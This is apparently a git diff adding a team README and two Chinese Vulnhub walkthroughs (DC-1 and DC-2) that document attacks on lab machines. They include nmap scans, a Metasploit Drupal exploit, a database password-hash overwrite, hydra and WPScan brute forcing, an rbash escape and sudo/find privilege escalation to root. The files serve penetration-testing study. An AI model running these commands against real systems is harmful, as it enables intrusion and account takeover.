靶机系列、复现文章

【复现文章】Timeline-漏洞复现-2020/README.md

@@ -0,0 +1,12 @@
+# 2020-Vulnerabilities
+本项目为Timeline Sec团队2020年复现的所有漏洞。
+
+# 贡献者
+水木逸轩（组长）、PingPig、daxi0ng、zhang0b、Ly、十一、falry、li9hu、s1mp1e、microworld、纸超人、🐟、hatjwe、Menge、蚂蚁、DEADF1SH_CAT、小泫、口算md5、idolVegeta、ebounce、Loading、蔷薇、蔷薇柠檬等
+
+# 疑问解答
++ Q：后续还会有更新吗？
++ A：会的。这些并未包含2020年的所有漏洞，后面如果复现了2020编号的CVE，还会更新上来。
+
+# 公众号
+![](https://cdn.jsdelivr.net/gh/filess/img17@main/2021/01/03/1609670087418-db73d665-2747-49a4-9a66-703500149c23.png)

【靶机系列】HTB-vulnhub/DC-1 靶机解题思路.md

@@ -0,0 +1,164 @@
+\> 本文由 \[简悦 SimpRead\](http://ksria.com/simpread/) 转码， 原文地址 \[mp.weixin.qq.com\](https://mp.weixin.qq.com/s/iaBfOS2oMS-rxPl1Qa7xqg)
+
+说明：Vulnhub 是一个渗透测试实战网站，提供了许多带有漏洞的渗透测试靶机下载。适合初学者学习，实践。DC-1 为基础入门篇，以下内容是自身复现的过程，总结记录下来，如有不足请多多指教。
+
+下载地址：
+
+https://www.vulnhub.com/entry/dc-1-1,292/
+
+目标机 IP 地址：192.168.5.137  
+攻击机 kali IP 地址：192.168.5.135
+
+**arp-scan 是一个用来进行系统发现的 ARP 命令扫描工具。**  
+
+命令 arp-scan  -l
+
+发现目标 ip 为：192.168.5.137
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9C9MkIJ5qSADZOzof5YLgpFvrwsicuzsFBv42ZNgesA3Br22d3WeQE8w/640?wx_fmt=png)
+
+**使用 nmap 进行端口查看**  
+
+nmap -sS -Pn  192.168.5.137  --min-rate 1000 -p1-65535  --open
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9S9mq4CLv2EsJdic9LxZDsMic3CsGZiaPslFthRquvicTb6h89W6coiaSRkQ/640?wx_fmt=png)
+
+\*flag1
+
+访问 80 端口发现是 Drupal 所搭建的站点。  
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa26WU79ukNNInNFvKD5BkmxAMy4zibxiaXtGiaugM6EIojU1euVcQAmdAiaxjj11uhxicRB8Ub6FdB7Uq4g/640?wx_fmt=png)
+
+msf 查找该 cms 有哪些可利用的漏洞 (一个一个实验)  
+
+如图：
+
+msfconsole   
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9DibFOATpvcRxbrdxNFiaubuJ6q3fJ7RL2kia4dREZg11NXe5SCUYicuEWQ/640?wx_fmt=png)
+
+攻击成功执行命令，发现 flag1.txt。  
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9SrrOnfby2QpibrgMuvU66pvdxDf7WgeFODaO7W0RXC0OwDqibAEfF0XQ/640?wx_fmt=png)
+
+\*flag2
+
+python-> 转换交互式 shell
+
+python -c 'import pty;pty.spawn("/bin/bash")'
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G94XgApuVqicKahjAMkfia36EtkIUF1EudkUHicofGaSoMM8odOtVIaqeKg/640?wx_fmt=png)
+
+**drupal 数据库配置文件**  /sites/default/settings.php
+
+找到 flag2 并得知是 mysql 的数据库以及用户名密码。dbuser/R0ck3t
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9GFyLQN5UyhDbks0T9nqnZ7r2hYibicJfwUsdrvpcceQ3UtByXkOoSZYQ/640?wx_fmt=png)
+
+\*flag3
+
+链接 mysql 通过 flag2 获取的数据库配置信息
+
+进入数据库查看数据
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9ejFr2cCezibulC2raOSFV7WRF5okwiaKgFhhRLIp9MbfTsmhPmpaMtcg/640?wx_fmt=png)
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9V6JNz4o1opfn4RQTcMxYt73R8gicjqKvgqIPcYAToACicOoU3R7mYiaWg/640?wx_fmt=png)
+
+查看表发现 users 表，查看该表字段返现用户名密码。
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9J7Sf5Hias9cBFtaNCu25m1uwtkXv2dibFh2B7C4jOI1xmdwLMXweiahbA/640?wx_fmt=png)
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/zg4ibGYrEa26WU79ukNNInNFvKD5BkmxAlJicuxUXgicuZZgibewkewGgSXXXRuuICicsIHeCInPMy7wvVcLDpYjQbg/640?wx_fmt=jpeg)
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/zg4ibGYrEa26WU79ukNNInNFvKD5BkmxAiakibgibqibe6STGxjPecicB4EwzOUAPktVH0M2kWuiaTSzfAxO13tNBpic7g/640?wx_fmt=jpeg)
+
+无法解密，那我们就将密码改掉，收集资料得知，Drupal 对用户密码的加密是通过特定的加密文件进行加密的，加密文件位置在网站根目录下的 scripts 下。
+
+使用加密脚本加密新密码 123456，生成加密密文。
+
+详细信息：
+
+https://www.drupal.org/node/1023428/ 
+
+通过官方描述，对密码进行修改
+
+password: 123456                
+
+hash: $S$D7lXBdKAW230VzfapF/GsJg98zV8z7T3GNlR45nZtR1uCcYh11fn
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/zg4ibGYrEa26WU79ukNNInNFvKD5BkmxAGeiaN0icY6DYjia2Gcb02YBmOJMEJ31EpiaIyFwNoMUZE97sMGHaXiaicRrw/640?wx_fmt=jpeg)
+
+对 admin 用户进行密码修改
+
+update users set pass ='$S$D7lXBdKAW230VzfapF/GsJg98zV8z7T3GNlR45nZtR1uCcYh11fn' where name = 'admin';
+
+已更改成功
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/zg4ibGYrEa26WU79ukNNInNFvKD5BkmxAVcFZdVFVsYZ8DoHwlDZsBia8mv60CAww01RW9wQ7Uj40VibI1QOQ0GMA/640?wx_fmt=jpeg)
+
+登陆后台成功，发现 flag3。  
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/zg4ibGYrEa26WU79ukNNInNFvKD5BkmxASKhgUp4MIjibZKHg2zupgDW3r4XhmPVyw3aUU9JGk5GTqXyAQicYZ76Q/640?wx_fmt=jpeg)
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/zg4ibGYrEa26WU79ukNNInNFvKD5BkmxAmprHFMV2E2FyBgn3UbNJXphtfk0Cnc5F7Yjiapkq5KL9O1TMIicytQGQ/640?wx_fmt=jpeg)
+
+\*flag4
+
+由 flag3 提示信息 我们要查看一下 / etc/passwd  以及 /etc/shadow
+
+由于权限的问题无法查看 shadow，查看 passwd 文件，发现 flag4 用户, 怀疑可以连接 ssh，对其进行 ssh 爆破。
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G92BL45wRHqGtH6Y3wbEMV0neUiaNXqoKPajPElycicJKHeica9YFwVQnoA/640?wx_fmt=png)
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9x9tLHRXr5dRrkHggeQbxWB5nBiaYQdcBAul5ugxuKtmRJgH4mae25Ew/640?wx_fmt=png)
+
+使用 john+hydra
+
+john 系统自带密码路径
+
+自带字典 :/usr/share/john/password.lst
+
+爆破命令:
+
+hydra -l flag4 -P /usr/share/john/password.lst ssh://192.168.5.137
+
+flag4/orange
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9KWXNk8XAuVmssKQ68QVLibiaz4IT1005yqg9cHJEUvHZqn1hm0STvvYA/640?wx_fmt=png)
+
+ssh 链接
+
+ssh [email protected]
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9XR0CQbqzmyQmgtv3PrxibU8FTCyYAWKFjKDMfpl6kiaB8cLa0ibBxklrQ/640?wx_fmt=png)
+
+进行提权获取 root 权限  
+
+find ./ gem -exec '/bin/sh' \\;  
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9I3JCkc5XjiamEn79BIj0I67Cs0UTnRSQm9SsPQtsUaKicMfbXLCp5RnA/640?wx_fmt=png)
+
+参考链接：https://www.freesion.com/article/7353791580/
+
+                 https://www.cnblogs.com/lxfweb/p/13364770.html
+
+免责声明：本站提供安全工具、程序 (方法) 可能带有攻击性，仅供安全研究与教学之用，风险自负!
+
+转载声明：著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。
+
+订阅查看更多复现文章、学习笔记
+
+thelostworld
+
+安全路上，与你并肩前行！！！！
+
+![](https://mmbiz.qpic.cn/mmbiz_jpg/uljkOgZGRjeUdNIfB9qQKpwD7fiaNJ6JdXjenGicKJg8tqrSjxK5iaFtCVM8TKIUtr7BoePtkHDicUSsYzuicZHt9icw/640?wx_fmt=jpeg)
+
+个人知乎：https://www.zhihu.com/people/fu-wei-43-69/columns
+
+个人简书：https://www.jianshu.com/u/bf0e38a8d400
+
+个人 CSDN：https://blog.csdn.net/qq\_37602797/category\_10169006.html
+
+![](https://mmbiz.qpic.cn/mmbiz_png/uljkOgZGRjcW6VR2xoE3js2J4uFMbFUKgglmlkCgua98XibptoPLesmlclJyJYpwmWIDIViaJWux8zOPFn01sONw/640?wx_fmt=png)

【靶机系列】HTB-vulnhub/DC-2 靶机解题思路.md

@@ -0,0 +1,185 @@
+\> 本文由 \[简悦 SimpRead\](http://ksria.com/simpread/) 转码， 原文地址 \[mp.weixin.qq.com\](https://mp.weixin.qq.com/s/V0cTKJrzMPgC6xyueUSx7g)
+
+说明：Vulnhub 是一个渗透测试实战网站，提供了许多带有漏洞的渗透测试靶机下载。适合初学者学习，实践。DC-2 是该系列第二版，以下内容是自身复现的过程，总结记录下来，如有不足请多多指教。
+
+下载地址：
+
+Download (Mirror): https://download.vulnhub.com/dc/DC-2.zip
+
+目标机 IP 地址：192.168.5.138  
+攻击机 kali IP 地址：192.168.5.135
+
+同网段信息收集与 DC-1 相同，不做过多的叙述。
+
+**\*falg1**  
+
+1、arp-scan  -l
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9tWyXxBVnBlKJj7lwObVRDOoY3QhzCPcFMCP9zTciaHJhibW6iax4vJ5Bw/640?wx_fmt=png)
+
+2、扫描该主机开放的端口，发现开放 80 端口，尝试访问。访问失败，本地无法对该域名进行解析，修改 host 文件。
+
+nmap -sV -p- 192.168.5.138
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9njH0KwB1uTwic9gq0l9GXarpAt2wqFMkJicVpQquibQfEnu2a2So2QR9Q/640?wx_fmt=png)
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9EJs8jMyv0V1sVjHS57U75oCPtmPctiaHAn53IibUsqzAqp6YbqyQu5Ww/640?wx_fmt=png)
+
+3、host 文件修改
+
+        vim  /etc/hosts   添加内容为：192.168.5.138    dc-2  修改后再次访问，即可。
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9P9JFB1NNsmhdPfRNyo8S88ZvmhKgL1a11ZdD5SCVZHqAN7Uz1XrPug/640?wx_fmt=png)
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9slBQSicOwG4YaGwJrIHMofeBPM9sY0vWgUamHDc7ibSZMkcQicRicNodibg/640?wx_fmt=png)
+
+ji![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9MEOYYqdspvBr1w2k26zIz81QzyqGyZ1RnIYkPTdurworYOK8rAjgMA/640?wx_fmt=png)
+
+进入后发现该站点为 WordPress（WordPress 是使用 PHP 语言开发的博客平台，用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统（CMS）来使用。--- 选自百度百科）以及 flag1。
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9icEdHrCkdBeZJUex82Tibucc7guDACgCEZNjLLdlc58iaTHiax4oVZ5iawQ/640?wx_fmt=png)
+
+**\*flag2**  
+
+根据 flag1 的关键字（如：cewl，password）等。
+
+cewl 介绍（Cewl 是一款采用 Ruby 开发的应用程序，你可以给它的爬虫指定 URL 地址和爬取深度，还可以添额外的外部链接，接下来 Cewl 会给你返回一个字典文件，你可以把字典用到类似 John the Ripper 这样的密码破解工具中。除此之外，Cewl 还提供了命令行工具。）
+
+命令 cewl -h  查看 cewl 的用法。
+
+根据提示使用 cewl 来爬取密码。
+
+cewl -w DcPassword.txt http://dc-2  
+
+收集 238 条密码。  
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9qgqT38DmYdt5EMdnUNSG1JMuJKE8jxhMvVgf1H2pknRc2ibdcM8tmpQ/640?wx_fmt=png)
+
+目录遍历，找到后台登陆页面。  
+
+python3.8 dirsearch.py -u "http://dc-2" -e\*
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9moBt7icYjPSPIeRUUQnpj8ib4PlNPClqtgAzsjZQneCIksnVCLeibG2ibQ/640?wx_fmt=png)
+
+访问登陆页面。
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9DTVBCEPYVKjzrUFaYHdGlKObn78Qy35CVrtQEJLicvKUKtlamibohZwQ/640?wx_fmt=png)
+
+使用 WPScan 工具扫描网站，并对用户名进行扫描。
+
+WPScan：WPScan 是 Kali Linux 默认自带的一款漏洞扫描工具，它采用 Ruby 编写，能够扫描 WordPress 网站中的多种安全漏洞，其中包括 WordPress 本身的漏洞、插件漏洞和主题漏洞。最新版本 WPScan 的数据库中包含超过 18000 种插件漏洞和 2600 种主题漏洞，并且支持最新版本的 WordPress。值得注意的是，它不仅能够扫描类似 robots.txt 这样的敏感文件，而且还能够检测当前已启用的插件和其他功能。
+
+wpscan --url http://dc-2/ -e u 
+
+爆出 3 位用户，admin，jerry，tom  
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9wSeCv9FgEIm2XBLqYolyACgkOdCIpyGI6ZtTgmThasmKcs0xWQCYXw/640?wx_fmt=png)
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9VTkB4MiabezbRqUT8MAKleSGMk0fIJy6VJMZslYGclzaxwFrM3DrdSQ/640?wx_fmt=png)
+
+使用 WPScan 进行爆破。
+
+Username: jerry, Password: adipiscing
+
+Username: tom, Password: parturient
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9F6Qk5eiawjuO12GFzFzkQtkYKAVc3VQdTvJDwy7G5q3RoextgfRuqKw/640?wx_fmt=png)
+
+登陆后台在 Pages 里找到 flag2
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9jv6QR0JPcTxUDa9uJpZ4dYDia3Xia7ibqMicSqlkHOAibDrMZVKuEqadIog/640?wx_fmt=png)
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9Dibk1gkHM4LRQuRUDjBgCJM2SWtXia4kTpnZ0iaLWS9xqVs17Wnplc53g/640?wx_fmt=png)
+
+\*flag3  
+
+flag2 提示要换一个入口，在扫描时发现对方的 ssh 服务正在开启中，端口为 7744 尝试连接。尝试连接，
+
+ssh [email protected] -p 7744 指定端口连接，用户为 tom（名字好记）。
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9BFOfgmLoRRuepF4ytjxyGtT3D5GeaHOte4LsoeKJdsoOsGHeFvGzibQ/640?wx_fmt=png)
+
+当登陆成功找到 flag3。  
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9clDqqNZnVqpG0dXicVzMYDd03bdibooayZzAzXUuK1ibkWwAx8OqssLog/640?wx_fmt=png)
+
+发现无法执行命令，命令执行受限制。  
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9qUg0DxoMsPg7m9L7Mibet3mia3o0y4DZiaIOfZfQXXzXZSyD661qz17qg/640?wx_fmt=png)
+
+rbash 受限 百度一下解释如下：rbash 就是受限制的 bash，一般管理员会限制很多命令，例如 whoami cd cat 等很多常用的命令，不过肯定会有命令可以使用，我们可以查看 $PATH 有哪些，或者自己挨个试。
+
+    1、echo $PATH #查看自己可以使用的命令
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9DSJmM7iaOb3JovmopUrcLxD7rHPx7ofial9zza3ibp1zwib3GqkKDvyI5A/640?wx_fmt=png)
+
+        2、echo /home/tom/usr/bin/\* # 查看可执行的命令
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9miao6RicVUfo4DqWhZarQ2QggwD58aEtQ8f4qaBFSt1mJWJJGEpobESg/640?wx_fmt=png)
+
+vi 对 flag3 文件进行查看。
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9wgox8a4zq0xERkFgj6rzucuLEWRRVc8ibvtqH0y6PDGV2xjOZQsP8ibg/640?wx_fmt=png)
+
+注：对 "rbash" 逃逸有兴趣了解，可以共同探讨。
+
+**\*flag4**
+
+flag3 提示我们要切换用户 Jerry，下一步对 jerry 进行切换。开启新的 shell 发起连接，发现无法连接，还是要进行 rbash 逃逸噗噗噗，不太明白这东西的原理那就百度好了。
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9TFiaRKKiaLuD5icE692AgIxibWCxqFMIqc7asMxWfiaeHicFGSJBFfq1icCmg/640?wx_fmt=png)
+
+BASH\_CMDS\[a\]=/bin/sh;a  
+
+    /bin/bash
+
+export PATH=$PATH:/bin
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9fQBsEsjTINyl4vItpDgq5dKOe7uaCTh1jslFTpDt3XvJ2GVO25wR1g/640?wx_fmt=png)
+
+成功逃逸。
+
+切换用户，连接成功。切换到 jerry 的家目录发现 flag4
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9t933icibWNGlpAJukDSMCfyNGSMTCrZiaClcnHF6gQW6LyCsdS4oKRFUg/640?wx_fmt=png)
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9OT4ibwE0XXsl4mNSnOEujjSVHxYxTKaibYoYd7tbEzO3NweI7F8U4Vdg/640?wx_fmt=png)
+
+flag4 提示我们还没有结束，提示关键字有 git，git 是一个开源分布式的控制系统。  
+
+sudo 用来以其他身份来执行命令，预设的身份是 root。
+
+sudo -l  # 列出目前用户可执行与无法执行的指令。该用户不需要 root 密码，以 root 权限来执行 git。
+
+通过 git 缓冲区漏洞进行提权。  
+git -h 选项中 有一项`-p | --paginate`这个 - p 的意思就是以分页的形式展示 git 的帮助信息，但是这里他会默认调用 more 来进行展示。
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9ggtGwP2cGaIgsBtfWAMcficaQK00ViaibPibwcUrBiaNeE1RrUlibErUMhVw/640?wx_fmt=png)
+
+sudo git -p --help
+
+!/bin/bash 提权成功。
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/zg4ibGYrEa24BvNcvIBhyg95tlHLwW4G9ZM6nVoMag6lZTeJlCXvphicCGtQeLjMLJP6Wan5HkYyOicXZrPqoxUVA/640?wx_fmt=png)  
+
+参考链接：https://www.bilibili.com/read/cv7955909/
+
+免责声明：本站提供安全工具、程序 (方法) 可能带有攻击性，仅供安全研究与教学之用，风险自负!
+
+转载声明：著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。
+
+订阅查看更多复现文章、学习笔记
+
+thelostworld
+
+安全路上，与你并肩前行！！！！
+
+![](https://mmbiz.qpic.cn/mmbiz_jpg/uljkOgZGRjeUdNIfB9qQKpwD7fiaNJ6JdXjenGicKJg8tqrSjxK5iaFtCVM8TKIUtr7BoePtkHDicUSsYzuicZHt9icw/640?wx_fmt=jpeg)
+
+个人知乎：https://www.zhihu.com/people/fu-wei-43-69/columns
+
+个人简书：https://www.jianshu.com/u/bf0e38a8d400
+
+个人 CSDN：https://blog.csdn.net/qq\_37602797/category\_10169006.html
+
+![](https://mmbiz.qpic.cn/mmbiz_png/uljkOgZGRjcW6VR2xoE3js2J4uFMbFUKgglmlkCgua98XibptoPLesmlclJyJYpwmWIDIViaJWux8zOPFn01sONw/640?wx_fmt=png)